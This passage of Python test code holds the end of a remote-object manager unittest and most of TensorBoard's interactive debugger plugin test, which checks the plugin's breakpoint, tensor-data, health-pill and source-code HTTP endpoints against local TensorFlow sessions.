t = threading.Thread(
target=self._run_remote_add, args=(remote_sim, ))
t.start()
threads.append(t)
for t in threads:
t.join()
def test_remote_object_with_call_raise_exception_function(self):
server_port = 17781
self._setUp(server_port)
remote_sim = self.remote_manager.get_remote()
try:
remote_sim.will_raise_exeception_func()
except RemoteError as e:
assert 'Traceback (most recent call last)' in str(e)
logger.info('Expected exception: {}'.format(e))
# expected
return
assert False
def _run_remote_add(self, remote_sim):
value = 0
for i in range(1000):
value = remote_sim.add_one(value)
assert value == i + 1
if __name__ == '__main__':
unittest.main()
|
interactive_debugger_plugin_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests end-to-end debugger interactive data server behavior.
This test launches an instance InteractiveDebuggerPlugin as a separate thread.
The test then calls Session.run() using RunOptions pointing to the grpc:// debug
URL of the debugger data server. It then sends HTTP requests to the TensorBoard
backend endpoints to query and control the state of the Sessoin.run().
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import shutil
import tempfile
import threading
import numpy as np
import portpicker # pylint: disable=import-error
from six.moves import urllib # pylint: disable=wrong-import-order
import tensorflow as tf # pylint: disable=wrong-import-order
from tensorflow.python import debug as tf_debug # pylint: disable=wrong-import-order
from werkzeug import test as werkzeug_test # pylint: disable=wrong-import-order
from werkzeug import wrappers # pylint: disable=wrong-import-order
from tensorboard.backend import application
from tensorboard.backend.event_processing import plugin_event_multiplexer as event_multiplexer # pylint: disable=line-too-long
from tensorboard.plugins import base_plugin
from tensorboard.plugins.debugger import interactive_debugger_plugin
_SERVER_URL_PREFIX = '/data/plugin/debugger/'
class InteractiveDebuggerPluginTest(tf.test.TestCase):
def setUp(self):
super(InteractiveDebuggerPluginTest, self).setUp()
self._dummy_logdir = tempfile.mkdtemp()
self._dummy_multiplexer = event_multiplexer.EventMultiplexer({})
self._debugger_port = portpicker.pick_unused_port()
self._debugger_url = 'grpc://localhost:%d' % self._debugger_port
context = base_plugin.TBContext(logdir=self._dummy_logdir,
multiplexer=self._dummy_multiplexer)
self._debugger_plugin = (
interactive_debugger_plugin.InteractiveDebuggerPlugin(context))
self._debugger_plugin.listen(self._debugger_port)
wsgi_app = application.TensorBoardWSGIApp(
self._dummy_logdir,
[self._debugger_plugin],
self._dummy_multiplexer,
reload_interval=0,
path_prefix='')
self._server = werkzeug_test.Client(wsgi_app, wrappers.BaseResponse)
def tearDown(self):
# In some cases (e.g., an empty test method body), the stop_server() method
# may get called before the server is started, leading to a ValueError.
while True:
try:
self._debugger_plugin._debugger_data_server.stop_server()
break
except ValueError:
pass
shutil.rmtree(self._dummy_logdir, ignore_errors=True)
super(InteractiveDebuggerPluginTest, self).tearDown()
def _serverGet(self, path, params=None, expected_status_code=200):
"""Send the serve a GET request and obtain the response.
Args:
path: URL path (excluding the prefix), without parameters encoded.
params: Query parameters to be encoded in the URL, as a dict.
expected_status_code: Expected status code.
Returns:
Response from server.
"""
url = _SERVER_URL_PREFIX + path
if params:
url += '?' + urllib.parse.urlencode(params)
response = self._server.get(url)
self.assertEqual(expected_status_code, response.status_code)
return response
def _deserializeResponse(self, response):
"""Deserializes byte content that is a JSON encoding.
Args:
response: A response object.
Returns:
The deserialized python object decoded from JSON.
"""
return json.loads(response.get_data().decode("utf-8"))
def _runSimpleAddMultiplyGraph(self, variable_size=1):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable([10.0] * variable_size, name='a')
b = tf.Variable([20.0] * variable_size, name='b')
c = tf.Variable([30.0] * variable_size, name='c')
x = tf.multiply(a, b, name="x")
y = tf.add(x, c, name="y")
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(y))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def _runMultiStepAssignAddGraph(self, steps):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable(10, dtype=tf.int32, name='a')
b = tf.Variable(1, dtype=tf.int32, name='b')
inc_a = tf.assign_add(a, b, name='inc_a')
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
for _ in range(steps):
session_run_results.append(sess.run(inc_a))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def _runTfGroupGraph(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable(10, dtype=tf.int32, name='a')
b = tf.Variable(20, dtype=tf.int32, name='b')
d = tf.constant(1, dtype=tf.int32, name='d')
inc_a = tf.assign_add(a, d, name='inc_a')
inc_b = tf.assign_add(b, d, name='inc_b')
inc_ab = tf.group([inc_a, inc_b], name="inc_ab")
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(inc_ab))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testCommAndAckWithoutBreakpoints(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
response_data = self._deserializeResponse(comm_response)
self.assertGreater(response_data['timestamp'], 0)
self.assertEqual('meta', response_data['type'])
self.assertEqual({'run_key': ['', 'y:0', '']}, response_data['data'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testGetDeviceNamesAndDebuggerGraph(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
response_data = self._deserializeResponse(comm_response)
run_key = json.dumps(response_data['data']['run_key'])
device_names_response = self._serverGet(
'gated_grpc', {'mode': 'retrieve_device_names', 'run_key': run_key})
device_names_data = self._deserializeResponse(device_names_response)
self.assertEqual(1, len(device_names_data['device_names']))
device_name = device_names_data['device_names'][0]
graph_response = self._serverGet(
'debugger_graph', {'run_key': run_key, 'device_name': device_name})
self.assertTrue(graph_response.get_data())
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testRetrieveAllGatedGrpcTensors(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
response_data = self._deserializeResponse(comm_response)
run_key = json.dumps(response_data['data']['run_key'])
retrieve_all_response = self._serverGet(
'gated_grpc', {'mode': 'retrieve_all', 'run_key': run_key})
retrieve_all_data = self._deserializeResponse(retrieve_all_response)
self.assertTrue(retrieve_all_data['device_names'])
# No breakpoints have been activated.
self.assertEqual([], retrieve_all_data['breakpoints'])
device_name = retrieve_all_data['device_names'][0]
tensor_names = [item[0] for item
in retrieve_all_data['gated_grpc_tensors'][device_name]]
self.assertItemsEqual(
['a', 'a/read', 'b', 'b/read', 'x', 'c', 'c/read', 'y'], tensor_names)
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testActivateOneBreakpoint(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Proceed to breakpoint x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([1], comm_data['data']['shape'])
self.assertEqual('x', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose([200.0], comm_data['data']['values'])
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# Verify that the activated breakpoint is remembered.
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertEqual([['x', 0, 'DebugIdentity']], breakpoints_data)
def testActivateAndDeactivateOneBreakpoint(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Deactivate the breakpoint right away.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'disable'})
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# Verify that there is no breakpoint activated.
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertEqual([], breakpoints_data)
def testActivateTwoBreakpoints(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Activate breakpoint for y:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'y', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Proceed to breakpoint x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([1], comm_data['data']['shape'])
self.assertEqual('x', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose([200.0], comm_data['data']['values'])
# Proceed to breakpoint y:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 3})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([1], comm_data['data']['shape'])
self.assertEqual('y', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose([230.0], comm_data['data']['values'])
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# Verify that the activated breakpoints are remembered.
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertItemsEqual(
[['x', 0, 'DebugIdentity'], ['y', 0, 'DebugIdentity']],
breakpoints_data)
def testCommResponseOmitsLargeSizedTensorValues(self):
session_run_thread, session_run_results = (
self._runSimpleAddMultiplyGraph(10))
comm_response = self._serverGet('comm', {'pos': 1})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', 'y:0', '']}, comm_data['data'])
# Activate breakpoint for inc_a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Continue to the breakpiont at x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([10], comm_data['data']['shape'])
self.assertEqual('x', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
# Verify that the large-sized tensor gets omitted in the comm response.
self.assertEqual(None, comm_data['data']['values'])
# Use the /tensor_data endpoint to obtain the full value of x:0.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'x:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertAllClose([[200.0] * 10], tensor_data['tensor_data'])
# Use the /tensor_data endpoint to obtain the sliced value of x:0.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'x:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': '[:5]'})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertAllClose([[200.0] * 5], tensor_data['tensor_data'])
# Continue to the end.
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0] * 10], session_run_results)
def testMultipleSessionRunsTensorValueFullHistory(self):
session_run_thread, session_run_results = (
self._runMultiStepAssignAddGraph(2))
comm_response = self._serverGet('comm', {'pos': 1})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', 'inc_a:0', '']}, comm_data['data'])
# Activate breakpoint for inc_a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'inc_a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Continue to inc_a:0 for the 1st time.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('int32', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('inc_a', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose(11.0, comm_data['data']['values'])
# Call /tensor_data to get the full history of the inc_a tensor (so far).
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'inc_a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual({'tensor_data': [11], 'error': None}, tensor_data)
# Continue to the beginning of the 2nd session.run.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 3})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', 'inc_a:0', '']}, comm_data['data'])
# Continue to inc_a:0 for the 2nd time.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 4})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('int32', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('inc_a', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose(12.0, comm_data['data']['values'])
# Call /tensor_data to get the full history of the inc_a tensor.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'inc_a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual({'tensor_data': [11, 12], 'error': None}, tensor_data)
# Call /tensor_data to get the latst time index of the inc_a tensor.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'inc_a:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual({'tensor_data': [12], 'error': None}, tensor_data)
# Continue to the end.
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([11.0, 12.0], session_run_results)
def testSetBreakpointOnNoTensorOp(self):
session_run_thread, session_run_results = self._runTfGroupGraph()
comm_response = self._serverGet('comm', {'pos': 1})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', '', 'inc_ab']}, comm_data['data'])
# Activate breakpoint for inc_a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'inc_a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Activate breakpoint for inc_ab.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'inc_ab', 'output_slot': -1,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Continue to inc_a:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('int32', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('inc_a', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose(11.0, comm_data['data']['values'])
# Continue to the end. The breakpoint at inc_ab should not have blocked
# the execution, due to the fact that inc_ab is a tf.group op that produces
# no output.
self._serverGet('ack')
session_run_thread.join()
self.assertEqual([None], session_run_results)
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertItemsEqual(
[['inc_a', 0, 'DebugIdentity'], ['inc_ab', -1, 'DebugIdentity']],
breakpoints_data)
def testCommDataCanBeServedToMultipleClients(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
comm_data_1 = self._deserializeResponse(comm_response)
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Activate breakpoint for y:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'y', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Proceed to breakpoint x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data_2 = self._deserializeResponse(comm_response)
self.assertGreater(comm_data_2['timestamp'], 0)
self.assertEqual('tensor', comm_data_2['type'])
self.assertEqual('float32', comm_data_2['data']['dtype'])
self.assertEqual([1], comm_data_2['data']['shape'])
self.assertEqual('x', comm_data_2['data']['node_name'])
self.assertEqual(0, comm_data_2['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data_2['data']['debug_op'])
self.assertAllClose([200.0], comm_data_2['data']['values'])
# Proceed to breakpoint y:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 3})
comm_data_3 = self._deserializeResponse(comm_response)
self.assertGreater(comm_data_3['timestamp'], 0)
self.assertEqual('tensor', comm_data_3['type'])
self.assertEqual('float32', comm_data_3['data']['dtype'])
self.assertEqual([1], comm_data_3['data']['shape'])
self.assertEqual('y', comm_data_3['data']['node_name'])
self.assertEqual(0, comm_data_3['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data_3['data']['debug_op'])
self.assertAllClose([230.0], comm_data_3['data']['values'])
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# A 2nd client requests for comm data at positions 1, 2 and 3 again.
comm_response = self._serverGet('comm', {'pos': 1})
self.assertEqual(comm_data_1, self._deserializeResponse(comm_response))
comm_response = self._serverGet('comm', {'pos': 2})
self.assertEqual(comm_data_2, self._deserializeResponse(comm_response))
comm_response = self._serverGet('comm', {'pos': 3})
self.assertEqual(comm_data_3, self._deserializeResponse(comm_response))
def testInvalidBreakpointStateLeadsTo400Response(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
# Use an invalid state ('bad_state') when setting a breakpoint state.
response = self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'bad_state'},
expected_status_code=400)
data = self._deserializeResponse(response)
self.assertEqual('Unrecognized new state for x:0:DebugIdentity: bad_state',
data['error'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testInvalidModeArgForGatedGrpcRouteLeadsTo400Response(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
# Use an invalid mode argument ('bad_mode') when calling the 'gated_grpc'
# endpoint.
response = self._serverGet(
'gated_grpc',
{'mode': 'bad_mode', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'},
expected_status_code=400)
data = self._deserializeResponse(response)
self.assertEqual('Unrecognized mode for the gated_grpc route: bad_mode',
data['error'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testDebuggerHostAndGrpcPortEndpoint(self):
response = self._serverGet('debugger_grpc_host_port')
response_data = self._deserializeResponse(response)
self.assertTrue(response_data['host'])
self.assertEqual(self._debugger_port, response_data['port'])
def testGetSourceFilePaths(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
source_paths_response = self._serverGet('source_code', {'mode': 'paths'})
response_data = self._deserializeResponse(source_paths_response)
self.assertIn(__file__, response_data['paths'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testGetSourceFileContentWithValidFilePath(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
file_content_response = self._serverGet(
'source_code', {'mode': 'content', 'file_path': __file__})
response_data = self._deserializeResponse(file_content_response)
# Verify that the content of this file is included.
self.assertTrue(response_data['content'][__file__])
# Verify that for the lines of the file that create TensorFlow ops, the list
# of op names and their stack heights are included.
op_linenos = collections.defaultdict(set)
for lineno in response_data['lineno_to_op_name_and_stack_pos']:
self.assertGreater(int(lineno), 0)
for op_name, stack_pos in response_data[
'lineno_to_op_name_and_stack_pos'][lineno]:
op_linenos[op_name].add(lineno)
self.assertGreaterEqual(stack_pos, 0)
self.assertTrue(op_linenos['a'])
self.assertTrue(op_linenos['a/Assign'])
self.assertTrue(op_linenos['a/initial_value'])
self.assertTrue(op_linenos['a/read'])
self.assertTrue(op_linenos['b'])
self.assertTrue(op_linenos['b/Assign'])
self.assertTrue(op_linenos['b/initial_value'])
self.assertTrue(op_linenos['b/read'])
self.assertTrue(op_linenos['c'])
self.assertTrue(op_linenos['c/Assign'])
self.assertTrue(op_linenos['c/initial_value'])
self.assertTrue(op_linenos['c/read'])
self.assertTrue(op_linenos['x'])
self.assertTrue(op_linenos['y'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testGetSourceOpTraceback(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
for op_name in ('a', 'b', 'c', 'x', 'y'):
op_traceback_reponse = self._serverGet(
'source_code', {'mode': 'op_traceback', 'op_name': op_name})
response_data = self._deserializeResponse(op_traceback_reponse)
found_current_file = False
for file_path, lineno in response_data['op_traceback'][op_name]:
self.assertGreater(lineno, 0)
if file_path == __file__:
found_current_file = True
break
self.assertTrue(found_current_file)
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def _runInitializer(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable([10.0] * 10, name='a')
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
# Run the initializer with a debugger-wrapped tf.Session.
session_run_results.append(sess.run(a.initializer))
session_run_results.append(sess.run(a))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testTensorDataForUnitializedTensorIsHandledCorrectly(self):
session_run_thread, session_run_results = self._runInitializer()
# Activate breakpoint for a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
self._serverGet('ack')
self._serverGet('ack')
self._serverGet('ack')
session_run_thread.join()
self.assertEqual(2, len(session_run_results))
self.assertIsNone(session_run_results[0])
self.assertAllClose([10.0] * 10, session_run_results[1])
# Get tensor data without slicing.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertIsNone(tensor_data['error'])
tensor_data = tensor_data['tensor_data']
self.assertEqual(2, len(tensor_data))
self.assertIsNone(tensor_data[0])
self.assertAllClose([10.0] * 10, tensor_data[1])
# Get tensor data with slicing.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': '[:5]'})
tensor_data = self._deserializeResponse(tensor_response)
self.assertIsNone(tensor_data['error'])
tensor_data = tensor_data['tensor_data']
self.assertEqual(2, len(tensor_data))
self.assertIsNone(tensor_data[0])
self.assertAllClose([10.0] * 5, tensor_data[1])
def testCommDataForUninitializedTensorIsHandledCorrectly(self):
session_run_thread, _ = self._runInitializer()
# Activate breakpoint for a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('Uninitialized', comm_data['data']['dtype'])
self.assertEqual('Uninitialized', comm_data['data']['shape'])
self.assertEqual('N/A', comm_data['data']['values'])
self.assertEqual(
'a/(a)', comm_data['data']['maybe_base_expanded_node_name'])
self._serverGet('ack')
self._serverGet('ack')
self._serverGet('ack')
session_run_thread.join()
def _runHealthPillNetwork(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable(
[np.nan, np.inf, np.inf, -np.inf, -np.inf, -np.inf, 10, 20, 30],
dtype=tf.float32, name='a')
session_run_results.append(sess.run(a.initializer))
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(a))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testHealthPill(self):
session_run_thread, _ = self._runHealthPillNetwork()
# Activate breakpoint for a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
self._serverGet('ack')
session_run_thread.join()
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'a:0:DebugIdentity',
'time_indices': '-1',
'mapping': 'health-pill',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertIsNone(tensor_data['error'])
tensor_data = tensor_data['tensor_data'][0]
self.assertAllClose(1.0, tensor_data[0]) # IsInitialized.
self.assertAllClose(9.0, tensor_data[1]) # Total count.
self.assertAllClose(1.0, tensor_data[2]) # NaN count.
self.assertAllClose(3.0, tensor_data[3]) # -Infinity count.
self.assertAllClose(0.0, tensor_data[4]) # Finite negative count.
self.assertAllClose(0.0, tensor_data[5]) # Zero count.
self.assertAllClose(3.0, tensor_data[6]) # Positive count.
self.assertAllClose(2.0, tensor_data[7]) # +Infinity count.
self.assertAllClose(10.0, tensor_data[8]) # Min.
self.assertAllClose(30.0, tensor_data[9]) # Max.
self.assertAllClose(20.0, tensor_data[10]) # Mean.
self.assertAllClose(
np.var([10.0, 20.0, 30.0]), tensor_data[11]) # Variance.
def _runStringNetwork(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
str1 = tf.Variable('abc', name='str1')
str2 = tf.Variable('def', name='str2')
str_concat = tf.add(str1, str2, name='str_concat')
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(str_concat))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testStringTensorIsHandledCorrectly(self):
session_run_thread, session_run_results = self._runStringNetwork()
# Activate breakpoint for str1:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'str1', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('object', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('abc', comm_data['data']['values'])
self.assertEqual(
'str1/(str1)', comm_data['data']['maybe_base_expanded_node_name'])
session_run_thread.join()
self.assertEqual(1, len(session_run_results))
self.assertEqual(b"abcdef", session_run_results[0])
# Get the value of a tensor without mapping.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'str1:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertEqual(['abc'], tensor_data['tensor_data'])
# Get the health pill of a string tensor.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'str1:0:DebugIdentity',
'time_indices': '-1',
'mapping': 'health-pill',
'slicing': ''})
